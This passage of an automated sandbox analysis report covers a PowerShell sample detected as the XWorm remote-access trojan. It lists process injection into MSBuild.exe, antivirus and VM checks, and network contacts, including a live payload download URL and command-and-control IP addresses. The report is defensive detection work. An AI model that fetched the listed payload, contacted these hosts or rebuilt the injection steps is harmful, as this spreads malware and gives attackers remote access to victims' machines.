Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, Messages.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: 0.2.powershell.exe.5533988.4.raw.unpack, SetVeloCity.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.powershell.exe.5533988.4.raw.unpack, SetVeloCity.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.powershell.exe.5533988.4.raw.unpack, SetVeloCity.cs Reference to suspicious API methods: VirtualAllocExAction(processInformation.ProcessHandle, num2, length, 12288, 64)
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.0.cs Jump to dropped file
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9F03.tmp" "c:\Users\user\AppData\Local\Temp\xe5lczmk\CSC16FE68AEE00E4CCA95C4EFA3D7C4CD.TMP" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\Desktop\185.7.214_1.54.ps1 VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected XWorm
Source: Yara match File source: 0.2.powershell.exe.55484c4.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.5538044.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.5538044.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.5533988.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.55484c4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.54caf50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4095873239.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1658041352.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4098300362.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6844, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected XWorm
Source: Yara match File source: 0.2.powershell.exe.55484c4.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.5538044.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.5538044.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.5533988.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.55484c4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.54caf50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4095873239.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1658041352.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4098300362.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6844, type: MEMORYSTR
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1614035 Sample: 185.7.214_1.54.ps1 Startdate: 13/02/2025 Architecture: WINDOWS Score: 100 37 Suricata IDS alerts for network traffic 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 12 other signatures 2->43 7 powershell.exe 15 26 2->7         started        12 notepad.exe 5 2->12         started        process3 dnsIp4 35 147.45.44.42, 49707, 80 FREE-NET-ASFREEnetEU Russian Federation 7->35 29 C:\Users\user\AppData\...\xe5lczmk.cmdline, Unicode 7->29 dropped 31 C:\Users\user\AppData\Local\...\xe5lczmk.0.cs, Unicode 7->31 dropped 45 Writes to foreign memory regions 7->45 47 Compiles code for process injection (via .Net compiler) 7->47 49 Injects a PE file into a foreign processes 7->49 14 MSBuild.exe 7->14         started        17 MSBuild.exe 2 7->17         started        20 csc.exe 3 7->20         started        23 conhost.exe 7->23         started        file5 signatures6 process7 dnsIp8 51 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->51 33 185.7.214.54, 4411, 49708 DELUNETDE France 17->33 27 C:\Users\user\AppData\Local\...\xe5lczmk.dll, PE32 20->27 dropped 25 cvtres.exe 1 20->25         started        file9 signatures10 process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
147.45.44.42
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
185.7.214.54
 unknown France
42652 DELUNETDE true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://147.45.44.42/boom/tybwfu.exe false
  • Avira URL Cloud: malware
 unknown
185.7.214.54 true
  • Avira URL Cloud: safe
 unknown